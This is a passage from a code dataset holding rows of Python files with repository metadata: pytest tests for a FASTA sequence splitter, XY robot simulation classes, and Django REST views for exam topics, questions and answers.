| 35 | 79 | 0.902857 | 15 | 175 | 10.266667 | 0.533333 | 0.220779 | 0.337662 | 0.415584 | 0.493506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074286 | 175 | 4 | 80 | 43.75 | 0.950617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
4e43dbd4dfe60d0087ce24575ba24120f81e0061 | 18,738 | py | Python | fastasplitter/tests/test_split_fasta_sequences_file.py | fossabot/fasta-splitter | b75d7728287af69a879c59395601ed092fffbbb7 | [
"MIT"
] | null | null | null | fastasplitter/tests/test_split_fasta_sequences_file.py | fossabot/fasta-splitter | b75d7728287af69a879c59395601ed092fffbbb7 | [
"MIT"
] | null | null | null | fastasplitter/tests/test_split_fasta_sequences_file.py | fossabot/fasta-splitter | b75d7728287af69a879c59395601ed092fffbbb7 | [
"MIT"
] | null | null | null | from pathlib import Path
import fastasplitter.exceptions
import fastasplitter.split_fasta_sequences_file
import pytest
import runpy
import sys
def test_when_number_of_arguments_equals_two_then_ok():
number_of_arguments_provided = 2
assert fastasplitter.split_fasta_sequences_file \
.check_if_is_valid_number_of_arguments(number_of_arguments_provided) is None
def test_when_number_of_arguments_not_equals_two_then_throws_invalid_number_of_arguments_exception():
number_of_arguments_provided = 3
with pytest.raises(fastasplitter.exceptions.InvalidNumberofArgumentsError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file.check_if_is_valid_number_of_arguments(number_of_arguments_provided)
invalid_number_of_arguments_message = "Invalid Number of Arguments Provided! \n" \
"Expected: 1 Argument (FASTA Sequences File). \n" \
"Provided: {0} Argument(s).".format(number_of_arguments_provided - 1)
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidNumberofArgumentsError
assert str(pytest_wrapped_e.value) == invalid_number_of_arguments_message
def test_when_sequences_file_not_exists_then_throws_file_not_found_exception():
inexistent_sequences_file = Path("inexistent_sequences.fasta")
with pytest.raises(FileNotFoundError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file.check_if_sequences_file_exists(inexistent_sequences_file)
file_not_found_message = "FASTA Sequences File not Found!"
assert pytest_wrapped_e.type == FileNotFoundError
assert str(pytest_wrapped_e.value) == file_not_found_message
def test_when_sequences_file_exists_then_return_sequences_file_extension():
sequences_file_extension_expected = ".fasta"
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w"):
pass
sequences_file_extension_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_extension(temporary_sequences_file)
assert sequences_file_extension_returned == sequences_file_extension_expected
temporary_sequences_file.unlink()
def test_when_sequences_file_has_no_fasta_extension_then_throws_invalid_extension_file_exception():
temporary_sequences_file = Path("sequences.txt")
with open(temporary_sequences_file, mode="w"):
pass
with pytest.raises(fastasplitter.exceptions.InvalidExtensionFileError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file.check_if_sequences_file_has_fasta_extension(temporary_sequences_file)
invalid_format_file_message = "Only FASTA Extension Files (.fa, .faa, .fasta, .ffn, .fna or .frn) are Allowed!"
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidExtensionFileError
assert str(pytest_wrapped_e.value) == invalid_format_file_message
temporary_sequences_file.unlink()
def test_when_description_line_is_parsed_then_return_description_lines_count():
description_line_count_expected = 1
line = ">ValidDescription1 |text1\n"
sequences_start_token = ">"
description_lines_count_returned = 0
description_lines_count_returned = fastasplitter.split_fasta_sequences_file \
.parse_description_line(line, sequences_start_token, description_lines_count_returned)
assert description_lines_count_returned == description_line_count_expected
def test_when_invalid_description_line_is_parsed_then_return_invalid_description_lines_count():
invalid_description_lines_count_expected = 1
line = "> InvalidDescription1\n"
sequences_start_token = ">"
invalid_description_lines_count_returned = 0
invalid_description_lines_count_returned = fastasplitter.split_fasta_sequences_file \
.parse_invalid_description_line(line, sequences_start_token, invalid_description_lines_count_returned)
assert invalid_description_lines_count_returned == invalid_description_lines_count_expected
def test_when_sequences_file_is_parsed_then_return_sequences_file_counter():
description_lines_count_expected = 2
invalid_description_lines_count_expected = 1
lines_count_expected = 4
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write("> InvalidDescription1\nAAA\n")
sequences_file.write(">ValidDescription1 |text1\nCCC\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter.split_fasta_sequences_file.get_sequences_file_counters(temporary_sequences_file)
assert description_lines_count_returned == description_lines_count_expected
assert invalid_description_lines_count_returned == invalid_description_lines_count_expected
assert lines_count_returned == lines_count_expected
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_not_any_description_line_then_throws_invalid_formatted_fasta_file_exception():
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write("AAA\n")
sequences_file.write("CCC\n")
sequences_file.write("GGG\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter.split_fasta_sequences_file.get_sequences_file_counters(temporary_sequences_file)
with pytest.raises(fastasplitter.exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file \
.check_if_sequences_file_has_any_description_line(temporary_sequences_file,
description_lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' Has Not Any Description Line!".format(str(temporary_sequences_file))
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_invalid_description_lines_then_throws_invalid_formatted_fasta_file_exception():
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write("> InvalidDescription1\nAAA\n")
sequences_file.write(">ValidDescription1 |text1\nCCC\n")
sequences_file.write(">ValidDescription2|text2\nGGG\n")
sequences_file.write("> InvalidDescription2|text2\nTTT\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter.split_fasta_sequences_file.get_sequences_file_counters(temporary_sequences_file)
with pytest.raises(fastasplitter.exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file \
.check_if_sequences_file_has_any_invalid_description_line(temporary_sequences_file,
invalid_description_lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' Contains {1} Line(s) With Invalid Description Format!" \
.format(str(temporary_sequences_file), str(2))
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_no_data_then_throws_invalid_formatted_fasta_file_exception():
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">ValidDescription1\n")
description_lines_count_returned, invalid_description_lines_count_returned, lines_count_returned = \
fastasplitter.split_fasta_sequences_file.get_sequences_file_counters(temporary_sequences_file)
with pytest.raises(fastasplitter.exceptions.InvalidFormattedFastaFileError) as pytest_wrapped_e:
fastasplitter.split_fasta_sequences_file.check_if_sequences_file_has_no_data(temporary_sequences_file,
lines_count_returned)
invalid_formatted_fasta_file_message = "'{0}' Seems a Empty Fasta File!".format(str(temporary_sequences_file))
assert pytest_wrapped_e.type == fastasplitter.exceptions.InvalidFormattedFastaFileError
assert str(pytest_wrapped_e.value) == invalid_formatted_fasta_file_message
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_all_valid_lines_then_ok():
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">ValidDescription1|text1\nAAA\n")
sequences_file.write(">ValidDescription2 |text2\nCCC\n")
sequences_file.write(">ValidDescription3\nGGG\n")
assert fastasplitter.split_fasta_sequences_file \
.check_if_is_valid_fasta_sequences_file(temporary_sequences_file) is None
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_no_path_parents_then_return_empty_path_parents_underscored_string():
sequences_file_path_parents_underscored_expected = ""
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w"):
pass
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_path_parents_underscored_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents_underscored(sequences_file_path_parents_returned)
assert sequences_file_path_parents_underscored_returned == sequences_file_path_parents_underscored_expected
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_path_parents_then_return_path_parents_underscored_string():
sequences_file_path_parents_underscored_expected = "sequences_directory"
temporary_sequences_directory = Path("sequences_directory")
temporary_sequences_directory.mkdir()
temporary_sequences_file = temporary_sequences_directory.joinpath("sequences.fasta")
with open(temporary_sequences_file, mode="w"):
pass
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_path_parents_underscored_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents_underscored(sequences_file_path_parents_returned)
assert sequences_file_path_parents_underscored_returned == sequences_file_path_parents_underscored_expected
temporary_sequences_file.unlink()
temporary_sequences_directory.rmdir()
def test_when_fasta_sequences_file_valid_then_return_sequences_name_list():
sequences_name_list_expected = ["Sequence1", "Sequence2", "Sequence3"]
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_name_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_name_list(temporary_sequences_file)
for index in range(len(sequences_name_list_returned)):
assert sequences_name_list_returned[index] == sequences_name_list_expected[index]
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_valid_then_return_sequences_data_list():
sequences_data_list_expected = ["AAA", "CCC", "GGG"]
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_data_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_data_list(temporary_sequences_file)
for index in range(len(sequences_data_list_returned)):
assert sequences_data_list_returned[index][1] == sequences_data_list_expected[index]
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_valid_then_split_sequences_and_write_to_disk():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_extension_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_extension(temporary_sequences_file)
sequences_name_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_name_list(temporary_sequences_file)
sequences_data_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_data_list(temporary_sequences_file)
fastasplitter.split_fasta_sequences_file \
.write_sequences_fasta_files_from_sequences_lists(sequences_file_path_parents_returned,
sequences_file_extension_returned,
sequences_name_list_returned,
sequences_data_list_returned)
assert sequence1_file_expected.exists()
assert sequence2_file_expected.exists()
assert sequence3_file_expected.exists()
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_no_path_parents_then_write_sequences_list_file_to_disk():
sequences_list_file_expected = Path("Sequences_List.txt")
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_path_parents_underscored_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents_underscored(sequences_file_path_parents_returned)
sequences_file_extension_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_extension(temporary_sequences_file)
sequences_name_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_name_list(temporary_sequences_file)
fastasplitter.split_fasta_sequences_file \
.write_sequences_fasta_files_index_list_text_file(sequences_file_path_parents_underscored_returned,
sequences_file_extension_returned,
sequences_name_list_returned)
assert sequences_list_file_expected.exists()
sequences_list_file_expected.unlink()
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_path_parents_then_write_sequences_list_file_to_disk():
sequences_list_file_expected = Path("sequences_directory_Sequences_List.txt")
temporary_sequences_directory = Path("sequences_directory")
temporary_sequences_directory.mkdir()
temporary_sequences_file = temporary_sequences_directory.joinpath("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_path_parents_underscored_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents_underscored(sequences_file_path_parents_returned)
sequences_file_extension_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_extension(temporary_sequences_file)
sequences_name_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_name_list(temporary_sequences_file)
fastasplitter.split_fasta_sequences_file \
.write_sequences_fasta_files_index_list_text_file(sequences_file_path_parents_underscored_returned,
sequences_file_extension_returned,
sequences_name_list_returned)
assert sequences_list_file_expected.is_file()
sequences_list_file_expected.unlink()
temporary_sequences_file.unlink()
temporary_sequences_directory.rmdir()
def test_when_execute_main_function_with_valid_fasta_sequences_file_then_return_successful_termination_code():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
sequences_list_file_expected = Path("Sequences_List.txt")
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sys.argv = ["", temporary_sequences_file]
with pytest.raises(SystemExit) as pytest_wrapped_e:
runpy.run_path("fastasplitter/split_fasta_sequences_file.py", run_name="__main__")
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 0
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
sequences_list_file_expected.unlink()
temporary_sequences_file.unlink()
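# To run this suite (assuming pytest is installed and the working directory is
# the repository root, which the runpy-based test relies on for its relative path):
#     $ pytest fastasplitter/tests/test_split_fasta_sequences_file.py -v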
| 59.11041 | 118 | 0.787757 | 2,196 | 18,738 | 6.175319 | 0.067395 | 0.220485 | 0.118428 | 0.089669 | 0.852666 | 0.804439 | 0.759826 | 0.737114 | 0.722661 | 0.701202 | 0 | 0.005755 | 0.146921 | 18,738 | 316 | 119 | 59.297468 | 0.842602 | 0 | 0 | 0.615942 | 0 | 0.003623 | 0.089124 | 0.023322 | 0 | 0 | 0 | 0 | 0.112319 | 1 | 0.072464 | false | 0.014493 | 0.021739 | 0 | 0.094203 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4eb3c253be4df6f8de155971e77558cc88966cce | 134 | py | Python | kirby/builtins/users/__init__.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | 5 | 2019-01-31T19:47:52.000Z | 2019-03-06T09:44:47.000Z | kirby/builtins/users/__init__.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | null | null | null | kirby/builtins/users/__init__.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | null | null | null | from .routes import create_user_route, get_user_by_id_route, get_users_route
from .controller import get_user_by_id, get_user_by_name
| 44.666667 | 76 | 0.880597 | 25 | 134 | 4.16 | 0.48 | 0.201923 | 0.259615 | 0.211538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08209 | 134 | 2 | 77 | 67 | 0.845528 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
14fd18c6880be27a7abc0c8e387b52b3616fd249 | 3,880 | py | Python | robot_sim/robots/xybot/xybot.py | wangyan-hlab/wrs | 8f81cdd33a419d5b4ffe18d13cd4cbf9f258bc7c | [
"MIT"
] | null | null | null | robot_sim/robots/xybot/xybot.py | wangyan-hlab/wrs | 8f81cdd33a419d5b4ffe18d13cd4cbf9f258bc7c | [
"MIT"
] | null | null | null | robot_sim/robots/xybot/xybot.py | wangyan-hlab/wrs | 8f81cdd33a419d5b4ffe18d13cd4cbf9f258bc7c | [
"MIT"
] | null | null | null | import math
import numpy as np
import robot_sim._kinematics.jlchain as jl
import robot_sim.robots.robot_interface as ri
class XYBot(ri.RobotInterface):
def __init__(self, pos=np.zeros(3), rotmat=np.eye(3), name='XYBot'):
super().__init__(pos=pos, rotmat=rotmat, name=name)
self.jlc = jl.JLChain(homeconf=np.zeros(2), name='XYBot')
self.jlc.jnts[1]['type'] = 'prismatic'
self.jlc.jnts[1]['loc_motionax'] = np.array([1, 0, 0])
self.jlc.jnts[1]['loc_pos'] = np.zeros(3)
self.jlc.jnts[1]['motion_rng'] = [-2.0, 15.0]
self.jlc.jnts[2]['type'] = 'prismatic'
self.jlc.jnts[2]['loc_motionax'] = np.array([0, 1, 0])
self.jlc.jnts[2]['loc_pos'] = np.zeros(3)
self.jlc.jnts[2]['motion_rng'] = [-2.0, 15.0]
self.jlc.reinitialize()
def fk(self, component_name='all', jnt_values=np.zeros(2)):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
self.jlc.fk(jnt_values)
def rand_conf(self, component_name='all'):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.rand_conf()
def get_jntvalues(self, component_name='all'):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.get_jnt_values()
def is_jnt_values_in_ranges(self, component_name, jnt_values):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.is_jnt_values_in_ranges(jnt_values)
def is_collided(self, obstacle_list=[], otherrobot_list=[]):
for (obpos, size) in obstacle_list:
dist = np.linalg.norm(np.asarray(obpos) - self.get_jntvalues())
if dist <= size / 2.0:
return True # collision
return False # safe
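# Minimal usage sketch for XYBot (illustrative values only; assumes the
# RobotInterface base class needs no setup beyond what __init__ does here):
#     bot = XYBot()
#     bot.fk(jnt_values=np.array([1.0, 2.0]))                       # move to (1, 2)
#     bot.is_collided(obstacle_list=[(np.array([1.0, 2.0]), 0.5)])  # True: at an obstacle center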
class XYTBot(ri.RobotInterface):
def __init__(self, pos=np.zeros(3), rotmat=np.eye(3), name='TwoWheelCarBot'):
super().__init__(pos=pos, rotmat=rotmat, name=name)
self.jlc = jl.JLChain(homeconf=np.zeros(3), name='XYBot')
self.jlc.jnts[1]['type'] = 'prismatic'
self.jlc.jnts[1]['loc_motionax'] = np.array([1, 0, 0])
self.jlc.jnts[1]['loc_pos'] = np.zeros(3)
self.jlc.jnts[1]['motion_rng'] = [-2.0, 15.0]
self.jlc.jnts[2]['type'] = 'prismatic'
self.jlc.jnts[2]['loc_motionax'] = np.array([0, 1, 0])
self.jlc.jnts[2]['loc_pos'] = np.zeros(3)
self.jlc.jnts[2]['motion_rng'] = [-2.0, 15.0]
self.jlc.jnts[3]['loc_motionax'] = np.array([0, 0, 1])
self.jlc.jnts[3]['loc_pos'] = np.zeros(3)
self.jlc.jnts[3]['motion_rng'] = [-math.pi, math.pi]
self.jlc.reinitialize()
def fk(self, component_name='all', jnt_values=np.zeros(3)):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
self.jlc.fk(jnt_values)
def rand_conf(self, component_name='all'):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.rand_conf()
def get_jntvalues(self, component_name='all'):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.get_jnt_values()
def is_jnt_values_in_ranges(self, component_name, jnt_values):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.is_jnt_values_in_ranges(jnt_values)
def is_collided(self, obstacle_list=[], otherrobot_list=[]):
for (obpos, size) in obstacle_list:
dist = np.linalg.norm(np.asarray(obpos) - self.get_jntvalues()[:2])
if dist <= size / 2.0:
return True # collision
return False # safe | 42.173913 | 81 | 0.605155 | 554 | 3,880 | 4.052347 | 0.140794 | 0.096659 | 0.093096 | 0.042762 | 0.925612 | 0.911359 | 0.911359 | 0.911359 | 0.900223 | 0.898441 | 0 | 0.024129 | 0.230928 | 3,880 | 92 | 82 | 42.173913 | 0.728217 | 0.007474 | 0 | 0.779221 | 0 | 0 | 0.13413 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155844 | false | 0 | 0.051948 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1178ec698be1b28e4dd0ef7cd9420ea7110b20fa | 10,934 | py | Python | content/views.py | AbdullahJaswal/Examination | 27f65a2e9630567ec213a13951965bb5b8db375d | [
"MIT"
] | null | null | null | content/views.py | AbdullahJaswal/Examination | 27f65a2e9630567ec213a13951965bb5b8db375d | [
"MIT"
] | null | null | null | content/views.py | AbdullahJaswal/Examination | 27f65a2e9630567ec213a13951965bb5b8db375d | [
"MIT"
] | null | null | null | from .serializers import *
from rest_framework import generics, status
from rest_framework.response import Response
from rest_framework.throttling import UserRateThrottle
from rest_framework.permissions import AllowAny, IsAuthenticated, IsAdminUser
from django.utils.decorators import method_decorator
from django.views.decorators.cache import cache_page
from django.conf import settings
import os
import pandas as pd
permissions = [AllowAny]
permissions_func = [AllowAny()]
# caching = [cache_page(60 * 5)]
caching = [cache_page(1)]
# Create your views here.
# Topic
class TopicList(generics.ListCreateAPIView):
model = Topic
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = TopicSerializer
def get_queryset(self):
return self.queryset.filter(is_active=True)
def get_permissions(self):
if self.request.method == 'POST':
return [IsAdminUser()]
return permissions_func
@method_decorator(caching)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
# Create CSV in <PROJECT_ROOT>/data for development
if settings.DEBUG:
data = self.queryset
df = pd.DataFrame(data.values())
project_path = settings.BASE_DIR
folder_name = '/data/'
app_name = '{}'.format(self.model._meta.app_label)
file_name = '/{}.csv'.format(self.model.__name__.lower())
folder_path = '{}{}{}'.format(project_path, folder_name, app_name)
file_path = '{}{}'.format(folder_path, file_name)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
if os.path.exists(file_path):
os.remove(file_path)
df = df.sort_values(by=['id'])
df.to_csv(file_path, index=False)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
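# Example request against this endpoint (a sketch; the URL route and any Topic
# fields other than is_active are assumptions, not defined in this file):
#     curl -X POST http://localhost:8000/topics/ \
#          -H "Content-Type: application/json" \
#          -d '{"name": "Algebra", "is_active": true}'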
class TopicDetail(generics.RetrieveUpdateDestroyAPIView):
model = Topic
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = TopicSerializer
def get_permissions(self):
if self.request.method in ['PUT', 'PATCH', 'DELETE']:
return [IsAdminUser()]
return permissions_func
# Sub Topic
class SubTopicList(generics.ListCreateAPIView):
model = SubTopic
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = SubTopicSerializer
def get_queryset(self):
return self.queryset.filter(is_active=True)
def get_permissions(self):
if self.request.method == 'POST':
return [IsAdminUser()]
return permissions_func
@method_decorator(caching)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
# Create CSV in <PROJECT_ROOT>/data for development
if settings.DEBUG:
data = self.queryset
df = pd.DataFrame(data.values())
project_path = settings.BASE_DIR
folder_name = '/data/'
app_name = '{}'.format(self.model._meta.app_label)
file_name = '/{}.csv'.format(self.model.__name__.lower())
folder_path = '{}{}{}'.format(project_path, folder_name, app_name)
file_path = '{}{}'.format(folder_path, file_name)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
if os.path.exists(file_path):
os.remove(file_path)
df = df.sort_values(by=['id'])
df.to_csv(file_path, index=False)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class SubTopicDetail(generics.RetrieveUpdateDestroyAPIView):
model = SubTopic
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = SubTopicSerializer
def get_permissions(self):
if self.request.method in ['PUT', 'PATCH', 'DELETE']:
return [IsAdminUser()]
return permissions_func
# Question
class QuestionList(generics.ListCreateAPIView):
model = Question
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = QuestionSerializer
def get_queryset(self):
return self.queryset.filter(is_active=True)
def get_permissions(self):
if self.request.method == 'POST':
return [IsAdminUser()]
return permissions_func
@method_decorator(caching)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
# Create CSV in <PROJECT_ROOT>/data for development
if settings.DEBUG:
data = self.queryset
df = pd.DataFrame(data.values())
project_path = settings.BASE_DIR
folder_name = '/data/'
app_name = '{}'.format(self.model._meta.app_label)
file_name = '/{}.csv'.format(self.model.__name__.lower())
folder_path = '{}{}{}'.format(project_path, folder_name, app_name)
file_path = '{}{}'.format(folder_path, file_name)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
if os.path.exists(file_path):
os.remove(file_path)
df = df.sort_values(by=['id'])
df.to_csv(file_path, index=False)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class QuestionDetail(generics.RetrieveUpdateDestroyAPIView):
model = Question
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = QuestionSerializer
def get_permissions(self):
if self.request.method in ['PUT', 'PATCH', 'DELETE']:
return [IsAdminUser()]
return permissions_func
# Answer
class AnswerList(generics.ListCreateAPIView):
model = Answer
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = AnswerSerializer
def get_queryset(self):
return self.queryset.filter(is_active=True)
def get_permissions(self):
if self.request.method == 'POST':
return [IsAdminUser()]
return permissions_func
@method_decorator(caching)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
# Create CSV in <PROJECT_ROOT>/data for development
if settings.DEBUG:
data = self.queryset
df = pd.DataFrame(data.values())
project_path = settings.BASE_DIR
folder_name = '/data/'
app_name = '{}'.format(self.model._meta.app_label)
file_name = '/{}.csv'.format(self.model.__name__.lower())
folder_path = '{}{}{}'.format(project_path, folder_name, app_name)
file_path = '{}{}'.format(folder_path, file_name)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
if os.path.exists(file_path):
os.remove(file_path)
df = df.sort_values(by=['id'])
df.to_csv(file_path, index=False)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class AnswerDetail(generics.RetrieveUpdateDestroyAPIView):
model = Answer
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
